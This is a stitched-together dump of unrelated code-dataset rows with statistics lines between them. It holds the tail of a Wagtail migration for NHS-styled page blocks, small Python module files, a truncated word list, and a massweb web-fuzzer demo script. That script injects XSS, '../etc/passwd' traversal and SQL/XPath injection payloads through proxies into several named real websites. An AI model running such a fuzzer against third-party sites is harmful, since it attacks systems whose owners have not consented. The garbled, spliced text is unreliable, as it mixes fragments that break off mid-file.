parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"image_block",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"promo_block",
wagtail.core.blocks.StructBlock(
[
(
"url",
wagtail.core.blocks.URLBlock(
label="URL", required=True
),
),
(
"heading",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"description",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
label="Image", required=False
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
]
),
),
(
"expander_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"body",
wagtail.core.blocks.StreamBlock(
[
(
"richtext",
wagtail.core.blocks.RichTextBlock(),
),
(
"action_link",
wagtail.core.blocks.StructBlock(
[
(
"text",
wagtail.core.blocks.CharBlock(
label="Link text",
required=True,
),
),
(
"external_url",
wagtail.core.blocks.URLBlock(
label="URL",
required=True,
),
),
(
"new_window",
wagtail.core.blocks.BooleanBlock(
label="Open in new window",
required=False,
),
),
]
),
),
(
"inset_text",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"image",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"grey_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading",
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"warning_callout",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important",
required=True,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"summary_list",
wagtail.core.blocks.StructBlock(
[
(
"rows",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.SummaryListRowBlock
),
),
(
"no_border",
wagtail.core.blocks.BooleanBlock(
default=False,
required=False,
),
),
]
),
),
],
required=True,
),
),
]
),
),
(
"grey_panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading", required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"inset_text_block",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"panel_list_block",
wagtail.core.blocks.StructBlock(
[
(
"panels",
wagtail.core.blocks.ListBlock(
wagtail.core.blocks.StructBlock(
[
(
"left_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"right_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
]
)
),
)
]
),
),
(
"promo_group_block",
wagtail.core.blocks.StructBlock(
[
(
"column",
wagtail.core.blocks.ChoiceBlock(
choices=[
("one-half", "One-half"),
("one-third", "One-third"),
]
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"promos",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.BasePromoBlock
),
),
]
),
),
(
"warning_callout_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important", required=True
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
],
blank=True,
verbose_name="Body blocks",
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
]
| 62.545364 | 200 | 0.152328 | 1,679 | 62,733 | 5.601549 | 0.081596 | 0.154386 | 0.233174 | 0.107177 | 0.959277 | 0.959277 | 0.959277 | 0.959277 | 0.959277 | 0.959277 | 0 | 0.01053 | 0.807741 | 62,733 | 1,002 | 201 | 62.607784 | 0.769256 | 0.000717 | 0 | 0.761809 | 1 | 0.01809 | 0.056998 | 0.001276 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01005 | 0 | 0.01407 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
d676cee102827e0bf7ebc9a3e8c74eab30c6e874 | 167 | py | Python | python/kwiver/vital/algo/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 176 | 2015-07-31T23:33:37.000Z | 2022-03-21T23:42:44.000Z | python/kwiver/vital/algo/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 1,276 | 2015-05-03T01:21:27.000Z | 2022-03-31T15:32:20.000Z | python/kwiver/vital/algo/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 85 | 2015-01-25T05:13:38.000Z | 2022-01-14T14:59:37.000Z | from __future__ import absolute_import
from kwiver.vital.config import Config
from kwiver.vital.algo.algorithm_factory import *
from kwiver.vital.algo.algos import *
| 27.833333 | 49 | 0.838323 | 24 | 167 | 5.583333 | 0.458333 | 0.223881 | 0.335821 | 0.313433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101796 | 167 | 5 | 50 | 33.4 | 0.893333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
d6979a89733b3423871a2768ff2089480033b52e | 111 | py | Python | holamundo.py | dgallards/multimedia | 7b6ed445b49381aa3a75b97db48d6bc4fc00f83a | [
"Apache-2.0"
] | null | null | null | holamundo.py | dgallards/multimedia | 7b6ed445b49381aa3a75b97db48d6bc4fc00f83a | [
"Apache-2.0"
] | 1 | 2022-02-24T10:30:18.000Z | 2022-02-24T10:30:18.000Z | holamundo.py | dgallards/multimedia | 7b6ed445b49381aa3a75b97db48d6bc4fc00f83a | [
"Apache-2.0"
] | null | null | null | def holamundo():
print("hola")
def holamundo():
print("hola a todos")
def holamundo():
print("hola gente")
| 13.875 | 22 | 0.666667 | 15 | 111 | 4.933333 | 0.466667 | 0.486486 | 0.689189 | 0.851351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144144 | 111 | 7 | 23 | 15.857143 | 0.778947 | 0 | 0 | 0.5 | 0 | 0 | 0.236364 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
d69ee7ffd35dc62344533a89853083ca35f5f293 | 3,637 | py | Python | test/docs/wiki_usage_test_4.py | acaceres2176/massweb | 153d1e00ee293f467e88e7f5ce98617a5c13cfb7 | [
"Apache-2.0"
] | null | null | null | test/docs/wiki_usage_test_4.py | acaceres2176/massweb | 153d1e00ee293f467e88e7f5ce98617a5c13cfb7 | [
"Apache-2.0"
] | null | null | null | test/docs/wiki_usage_test_4.py | acaceres2176/massweb | 153d1e00ee293f467e88e7f5ce98617a5c13cfb7 | [
"Apache-2.0"
] | null | null | null | """
from massweb.fuzzers.web_fuzzer import WebFuzzer
from massweb.payloads.payload import Payload
proxies = [{"http": "user:password@http://proxy.example.com:1234/some/path"}, {"http": "otheruser:otherpassword@http://proxy2.example.net:6789/some/path"}]
xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"])
sqli_xpathi_payload = Payload("')--", check_type_list=["sqli", "xpathi"])
wf = WebFuzzer(num_threads=30, time_per_url=5, proxy_list=proxies)
wf.add_payload(xss_payload)
wf.add_payload(trav_payload)
wf.add_payload(sqli_xpathi_payload)
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln1")
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/")
wf.add_target_from_url(u"http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E")
wf.add_target_from_url(u"http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1")
wf.add_target_from_url(u"http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1")
wf.add_target_from_url(u"http://www.dobrevsource.org/index.php?id=1")
print "Targets list pre post determination:"
for target in wf.targets:
print target
print "Targets list after additional injection points have been found:"
wf.determine_posts_from_targets()
for target in wf.targets:
print target.url, target.data
print "FuzzyTargets list:"
wf.generate_fuzzy_targets()
for ft in wf.fuzzy_targets:
print ft, ft.ttype, ft.data
print "Results of our fuzzing:"
for r in wf.fuzz():
print r, r.fuzzy_target.ttype, r.fuzzy_target.payload
"""
# Demo script for the massweb WebFuzzer.
# NOTE: Python 2 code (bare ``print`` statements) — do not run under Python 3.
from massweb.fuzzers.web_fuzzer import WebFuzzer
from massweb.payloads.payload import Payload

# Outbound HTTP proxies the fuzzer rotates through (example credentials).
proxies = [{"http": "user:password@http://proxy.example.com:1234/some/path"}, {"http": "otheruser:otherpassword@http://proxy2.example.net:6789/some/path"}]

# Attack payloads: reflected XSS, path traversal, and SQL/XPath injection,
# each tagged with the check types used to classify responses.
xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"])
trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"])
sqli_xpathi_payload = Payload("')--", check_type_list=["sqli", "xpathi"])

# 30 worker threads, 5 seconds budget per URL.
wf = WebFuzzer(num_threads=30, time_per_url=5, proxy_list=proxies)
wf.add_payload(xss_payload)
wf.add_payload(trav_payload)
wf.add_payload(sqli_xpathi_payload)

# Seed targets (deliberately vulnerable test pages and sample URLs).
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln1")
wf.add_target_from_url(u"http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/")
wf.add_target_from_url(u"http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E")
wf.add_target_from_url(u"http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1")
wf.add_target_from_url(u"http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1")
wf.add_target_from_url(u"http://www.dobrevsource.org/index.php?id=1")

print "Targets list pre post determination:"
for target in wf.targets:
    print target

# Crawl the targets for forms to discover additional POST injection points.
print "Targets list after additional injection points have been found:"
wf.determine_posts_from_targets()
for target in wf.targets:
    print target.url, target.data

# Expand each target x payload x injection point into FuzzyTargets.
print "FuzzyTargets list:"
wf.generate_fuzzy_targets()
for ft in wf.fuzzy_targets:
    print ft, ft.ttype, ft.data

# Run the fuzzer and report each result with its request type and payload.
print "Results of our fuzzing:"
for r in wf.fuzz():
    print r, r.fuzzy_target.ttype, r.fuzzy_target.payload
| 45.4625 | 159 | 0.726973 | 542 | 3,637 | 4.701107 | 0.210332 | 0.035322 | 0.051805 | 0.070644 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.039755 | 0.100907 | 3,637 | 79 | 160 | 46.037975 | 0.73945 | 0 | 0 | 0.066667 | 0 | 0.1 | 0.452991 | 0.054131 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.066667 | 0.066667 | null | null | 0.266667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
d6b8e145b57f2f06c42d63214e5cf96dce132114 | 18,634 | py | Python | stable_world/interact/bucket_configs/words.py | StableWorld/stable.world | 08759ced5eb56c5f8d8e60dd27a81b420015a740 | [
"BSD-2-Clause"
] | null | null | null | stable_world/interact/bucket_configs/words.py | StableWorld/stable.world | 08759ced5eb56c5f8d8e60dd27a81b420015a740 | [
"BSD-2-Clause"
] | 1 | 2018-08-11T02:32:55.000Z | 2018-08-11T02:32:55.000Z | stable_world/interact/bucket_configs/words.py | StableWorld/stable.world | 08759ced5eb56c5f8d8e60dd27a81b420015a740 | [
"BSD-2-Clause"
] | null | null | null | # flake8: noqa
adjectives = ['average', 'big', 'colossal', 'fat', 'giant', 'gigantic', 'great', 'huge', 'immense', 'large', 'little', 'long', 'mammoth', 'massive', 'miniature', 'petite', 'puny', 'short', 'small', 'tall', 'tiny', 'boiling', 'breezy', 'broken', 'bumpy', 'chilly', 'cold', 'cool', 'creepy', 'crooked', 'cuddly', 'curly', 'damaged', 'damp', 'dirty', 'dry', 'dusty', 'filthy', 'flaky', 'fluffy', 'wet', 'broad', 'chubby', 'crooked', 'curved', 'deep', 'flat', 'high', 'hollow', 'low', 'narrow', 'round', 'shallow', 'skinny', 'square', 'steep', 'straight', 'wide', 'ancient', 'brief', 'early', 'fast', 'late', 'long', 'modern', 'old', 'old-fashioned', 'quick', 'rapid', 'short', 'slow', 'swift', 'young', 'abundant', 'empty', 'few', 'heavy', 'light', 'many', 'numerous', 'Sound', 'cooing', 'deafening', 'faint', 'harsh', 'high-pitched', 'hissing', 'hushed', 'husky', 'loud', 'melodic', 'moaning', 'mute', 'noisy', 'purring', 'quiet', 'raspy', 'resonant', 'screeching', 'shrill', 'silent', 'soft', 'squealing', 'thundering', 'voiceless', 'whispering', 'bitter', 'delicious', 'fresh', 'juicy', 'ripe', 'rotten', 'salty', 'sour', 'spicy', 'stale', 'sticky', 'strong', 'sweet', 'tasteless', 'tasty', 'thirsty', 'fluttering', 'fuzzy', 'greasy', 'grubby', 'hard', 'hot', 'icy', 'loose', 'melted', 'plastic', 'prickly', 'rainy', 'rough', 'scattered', 'shaggy', 'shaky', 'sharp', 'shivering', 'silky', 'slimy', 'slippery', 'smooth', 'soft', 'solid', 'steady', 'sticky', 'tender', 'tight', 'uneven', 'weak', 'wet', 'wooden', 'afraid', 'angry', 'annoyed', 'anxious', 'arrogant', 'ashamed', 'awful', 'bad', 'bewildered', 'bored', 'combative', 'condemned', 'confused', 'creepy', 'cruel', 'dangerous', 'defeated', 'defiant', 'depressed', 'disgusted', 'disturbed', 'eerie', 'embarrassed', 'envious', 'evil', 'fierce', 'foolish', 'frantic', 'frightened', 'grieving', 'helpless', 'homeless', 'hungry', 'hurt', 'ill', 'jealous', 'lonely', 'mysterious', 'naughty', 'nervous', 'obnoxious', 'outrageous', 'panicky', 
'repulsive', 'scary', 'scornful', 'selfish', 'sore', 'tense', 'terrible', 'thoughtless', 'tired', 'troubled', 'upset', 'uptight', 'weary', 'wicked', 'worried', 'agreeable', 'amused', 'brave', 'calm', 'charming', 'cheerful', 'comfortable', 'cooperative', 'courageous', 'delightful', 'determined', 'eager', 'elated', 'enchanting', 'encouraging', 'energetic', 'enthusiastic', 'excited', 'exuberant', 'fair', 'faithful', 'fantastic', 'fine', 'friendly', 'funny', 'gentle', 'glorious', 'good', 'happy', 'healthy', 'helpful', 'hilarious', 'jolly', 'joyous', 'kind', 'lively', 'lovely', 'lucky', 'obedient', 'perfect', 'pleasant', 'proud', 'relieved', 'silly', 'smiling', 'splendid', 'successful', 'thoughtful', 'victorious', 'vivacious', 'witty', 'wonderful', 'zealous', 'zany', 'other', 'good', 'new', 'old', 'great', 'high', 'small', 'different', 'large', 'local', 'social', 'important', 'long', 'young', 'national', 'british', 'right', 'early', 'possible', 'big', 'little', 'political', 'able', 'late', 'general', 'full', 'far', 'low', 'public', 'available', 'bad', 'main', 'sure', 'clear', 'major', 'economic', 'only', 'likely', 'real', 'black', 'particular', 'international', 'special', 'difficult', 'certain', 'open', 'whole', 'white', 'free', 'short', 'easy', 'strong', 'european', 'central', 'similar', 'human', 'common', 'necessary', 'single', 'personal', 'hard', 'private', 'poor', 'financial', 'wide', 'foreign', 'simple', 'recent', 'concerned', 'american', 'various', 'close', 'fine', 'english', 'wrong', 'present', 'royal', 'natural', 'individual', 'nice', 'french', 'following', 'current', 'modern', 'labour', 'legal', 'happy', 'final', 'red', 'normal', 'serious', 'previous', 'total', 'prime', 'significant', 'industrial', 'sorry', 'dead', 'specific', 'appropriate', 'top', 'soviet', 'basic', 'military', 'original', 'successful', 'aware', 'hon', 'popular', 'heavy', 'professional', 'direct', 'dark', 'cold', 'ready', 'green', 'useful', 'effective', 'western', 'traditional', 'scottish', 
'german', 'independent', 'deep', 'interesting', 'considerable', 'involved', 'physical', 'left', 'hot', 'existing', 'responsible', 'complete', 'medical', 'blue', 'extra', 'past', 'male', 'interested', 'fair', 'essential', 'beautiful', 'civil', 'primary', 'obvious', 'future', 'environmental', 'positive', 'senior', 'nuclear', 'annual', 'relevant', 'huge', 'rich', 'commercial', 'safe', 'regional', 'practical', 'official', 'separate', 'key', 'chief', 'regular', 'due', 'additional', 'active', 'powerful', 'complex', 'standard', 'impossible', 'light', 'warm', 'middle', 'fresh', 'sexual', 'front', 'domestic', 'actual', 'united', 'technical', 'ordinary', 'cheap', 'strange', 'internal', 'excellent', 'quiet', 'soft', 'potential', 'northern', 'religious', 'quick', 'very', 'famous', 'cultural', 'proper', 'broad', 'joint', 'formal', 'limited', 'conservative', 'lovely', 'usual', 'ltd', 'unable', 'rural', 'initial', 'substantial', 'christian', 'bright', 'average', 'leading', 'reasonable', 'immediate', 'suitable', 'equal', 'detailed', 'working', 'overall', 'female', 'afraid', 'democratic', 'growing', 'sufficient', 'scientific', 'eastern', 'correct', 'inc', 'irish', 'expensive', 'educational', 'mental', 'dangerous', 'critical', 'increased', 'familiar', 'unlikely', 'double', 'perfect', 'slow', 'tiny', 'dry', 'historical', 'thin', 'daily', 'southern', 'increasing', 'wild', 'alone', 'urban', 'empty', 'married', 'narrow', 'liberal', 'supposed', 'upper', 'apparent', 'tall', 'busy', 'bloody', 'prepared', 'russian', 'moral', 'careful', 'clean', 'attractive', 'japanese', 'vital', 'thick', 'alternative', 'fast', 'ancient', 'elderly', 'rare', 'external', 'capable', 'brief', 'wonderful', 'grand', 'typical', 'entire', 'grey', 'constant', 'vast', 'surprised', 'ideal', 'terrible', 'academic', 'funny', 'minor', 'pleased', 'severe', 'ill', 'corporate', 'negative', 'permanent', 'weak', 'brown', 'fundamental', 'odd', 'crucial', 'inner', 'used', 'criminal', 'contemporary', 'sharp', 'sick', 'near', 
'roman', 'massive', 'unique', 'secondary', 'parliamentary', 'african', 'unknown', 'subsequent', 'angry', 'alive', 'guilty', 'lucky', 'enormous', 'well', 'communist', 'yellow', 'unusual', 'net', 'long-term', 'tough', 'dear', 'extensive', 'glad', 'remaining', 'agricultural', 'alright', 'healthy', 'italian', 'principal', 'tired', 'efficient', 'comfortable', 'chinese', 'relative', 'friendly', 'conventional', 'willing', 'sudden', 'proposed', 'voluntary', 'slight', 'valuable', 'dramatic', 'golden', 'temporary', 'federal', 'keen', 'flat', 'silent', 'indian', 'video-taped', 'worried', 'pale', 'statutory', 'welsh', 'dependent', 'firm', 'wet', 'competitive', 'armed', 'radical', 'outside', 'acceptable', 'sensitive', 'living', 'pure', 'global', 'emotional', 'sad', 'secret', 'rapid', 'adequate', 'fixed', 'sweet', 'administrative', 'wooden', 'remarkable', 'comprehensive', 'surprising', 'solid', 'rough', 'mere', 'mass', 'brilliant', 'maximum', 'absolute', 'tory', 'electronic', 'visual', 'electric', 'cool', 'spanish', 'literary', 'continuing', 'supreme', 'chemical', 'genuine', 'exciting', 'written', 'stupid', 'advanced', 'extreme', 'classical', 'fit', 'favourite', 'socialist', 'widespread', 'confident', 'straight', 'catholic', 'proud', 'numerous', 'opposite', 'distinct', 'mad', 'helpful', 'given', 'disabled', 'consistent', 'anxious', 'nervous', 'awful', 'stable', 'constitutional', 'satisfied', 'conscious', 'developing', 'strategic', 'holy', 'smooth', 'dominant', 'remote', 'theoretical', 'outstanding', 'pink', 'pretty', 'clinical', 'minimum', 'honest', 'impressive', 'related', 'residential', 'extraordinary', 'plain', 'visible', 'accurate', 'distant', 'still', 'greek', 'complicated', 'musical', 'precise', 'gentle', 'broken', 'live', 'silly', 'fat', 'tight', 'monetary', 'round', 'psychological', 'violent', 'unemployed', 'inevitable', 'junior', 'sensible', 'grateful', 'pleasant', 'dirty', 'structural', 'welcome', 'so-called', 'deaf']
nouns = ['richard', 'decryption', 'bangladesh', 'pony', 'futon', 'karate', 'oboe', 'fireplace', 'cribbage', 'vise', 'shack', 'rat', 'cellar', 'interloper', 'rediscovery', 'magician', 'bonnet', 'session', 'policeman', 'jackal', 'ashtray', 'form', 'discount', 'manservant', 'damage', 'bijou', 'bassinet', 'blouse', 'brome', 'tough-guy', 'space', 'beauty', 'arrow', 'yurt', 'responsibility', 'draw', 'edge', 'link', 'elephant', 'visor', 'crew', 'commercial', 'train', 'football', 'regret', 'bend', 'fatigues', 'december', 'till', 'chinese', 'vane', 'forgery', 'stocking', 'deformation', 'mint', 'geriatrician', 'recess', 'recommendation', 'definition', 'iraq', 'barometer', 'partner', 'king', 'person', 'accident', 'care', 'dragon', 'cowbell', 'strawberry', 'rethinking', 'attenuation', 'birdcage', 'review', 'winter', 'sabre', 'evidence', 'eggplant', 'ease', 'typhoon', 'arch-rival', 'floozie', 'frazzle', 'feature', 'lady', 'disgust', 'blade', 'gauge', 'diadem', 'octet', 'earmuffs', 'caption', 'ecumenist', 'second', 'mantua', 'coal', 'satisfaction', 'microlending', 'honoree', 'hospice', 'shallot', 'landform', 'pantsuit', 'north', 'drawing', 'manx', 'ear', 'analog', 'usher', 'tummy', 'theism', 'tangerine', 'bondsman', 'mantle', 'soil', 'composer', 'spectacle', 'bugle', 'pamphlet', 'apron', 'screw', 'sloth', 'sector', 'empowerment', 'sympathy', 'puffin', 'hops', 'effective', 'breakpoint', 'foot', 'summer', 'grey', 'cymbals', 'chastity', 'cotton', 'cash', 'cob', 'movie', 'yam', 'lighting', 'extreme', 'committee', 'zinc', 'bangle', 'original', 'inventory', 'health', 'crook', 'menu', 'phrase', 'catamaran', 'arm', 'godmother', 'scrip', 'compulsion', 'mark', 'use', 'trailer', 'nondisclosure', 'future', 'cashier', 'shovel', 'comradeship', 'airfare', 'gram', 'batter', 'tablecloth', 'bowling', 'fiddle', 'junker', 'tandem', 'chivalry', 'shopper', 'body', 'engineering', 'cousin', 'classroom', 'quiver', 'sky', 'canvas', 'tram', 'alcove', 'jewel', 'criteria', 'menorah', 'minister', 'pelt', 
'polish', 'rub', 'sugar', 'capricorn', 'croissant', 'pitch', 'adapter', 'collision', 'michael', 'cloud', 'alibi', 'casino', 'sponge', 'octagon', 'rate', 'jury', 'dictaphone', 'pin', 'bongo', 'fundraising', 'august', 'playground', 'year', 'armor', 'sell', 'initial', 'peony', 'meal', 'plywood', 'retina', 'balloon', 'mechanic', 'rocker', 'tenement', 'block', 'temperature', 'hexagon', 'deer', 'babe', 'angora', 'hive', 'lead', 'purple', 'tear', 'gem', 'fur', 'crystallography', 'apparatus', 'oxford', 'pink', 'pudding', 'resource', 'industry', 'lever', 'mukluk', 'demand', 'almanac', 'paperback', 'wool', 'number', 'pilgrimage', 'production', 'liner', 'pasta', 'enquiry', 'activity', 'moustache', 'change', 'marxism', 'cherries', 'coonskin', 'crash', 'language', 'mousse', 'libra', 'outrigger', 'impress', 'sonnet', 'sweets', 'slider', 'aluminum', 'pvc', 'cappelletti', 'bracket', 'custard', 'tree', 'mistake', 'education', 'altitude', 'legume', 'shoulder', 'cocoa', 'bather', 'desert', 'perspective', 'interviewer', 'violet', 'calculation', 'underground', 'bunghole', 'character', 'shock', 'charge', 'material', 'atm', 'bass', 'tepee', 'patrol', 'cultivator', 'oldie', 'motorboat', 'hot', 'netbook', 'knuckle', 'september', 'cup', 'carnation', 'beyond', 'bag', 'porter', 'crib', 'great-grandmother', 'beach', 'heartwood', 'address', 'attraction', 'conference', 'oval', 'pancake', 'poland', 'backpack', 'alloy', 'contrary', 'bird', 'rectangle', 'pail', 'acoustic', 'dentist', 'downgrade', 'prelude', 'canteen', 'tomato', 'trapdoor', 'sleep', 'low', 'airmail', 'moth', 'consul', 'conversation', 'passion', 'eyeliner', 'carbon', 'ottoman', 'inspection', 'lizard', 'recruit', 'fly', 'well', 'command', 'party', 'goodbye', 'drama', 'mouser', 'moment', 'tutu', 'luttuce', 'pocket', 'volcano', 'bagpipes', 'bacon', 'clerk', 'pine', 'peach', 'water', 'cupboard', 'choice', 'television', 'sunday', 'sale', 'fratricide', 'sustainment', 'title', 'cement', 'publisher', 'editorial', 'cupola', 'elbow', 'nerve', 
'vanity', 'knight', 'whorl', 'soda', 'malaysia', 'control', 'format', 'tank-top', 'trolley', 'funeral', 'former', 'diploma', 'pseudoscience', 'cesspool', 'net', 'marketing', 'umbrella', 'policy', 'cauliflower', 'offence', 'apple', 'find', 'netball', 'councilor', 'lion', 'onion', 'overclocking', 'chive', 'tanker', 'scarecrow', 'laborer', 'escape', 'savior', 'mezzanine', 'freight', 'music', 'shoestring', 'artificer', 'blackboard', 'riddle', 'pinto', 'monastery', 'west', 'hurry', 'fruit', 'ink', 'slash', 'hydrant', 'frost', 'noise', 'unblinking', 'replace', 'spacing', 'weasel', 'in-laws', 'friday', 'ride', 'trick', 'alpenhorn', 'sage', 'tabby', 'guitar', 'forestry', 'agreement', 'peak', 'pocket-watch', 'cameo', 'pen', 'gosling', 'save', 'grassland', 'packet', 'dog', 'sarah', 'kneejerk', 'possibility', 'maybe', 'cherry', 'misplacement', 'caravan', 'shred', 'bake', 'meaning', 'roller', 'problem', 'reception', 'pressurisation', 'design', 'chocolate', 'destiny', 'mailbox', 'cot', 'disease', 'toque', 'swimming', 'conspirator', 'corduroy', 'sleuth', 'potential', 'dark', 'pearl', 'gearshift', 'laparoscope', 'goal', 'cent', 'panda', 'bar', 'john', 'cottage', 'squid', 'curtain', 'vegetable', 'rope', 'insurgence', 'garment', 'submarine', 'butter', 'constellation', 'slippers', 'view', 'humidity', 'freighter', 'explanation', 'abolishment', 'difficulty', 'sun', 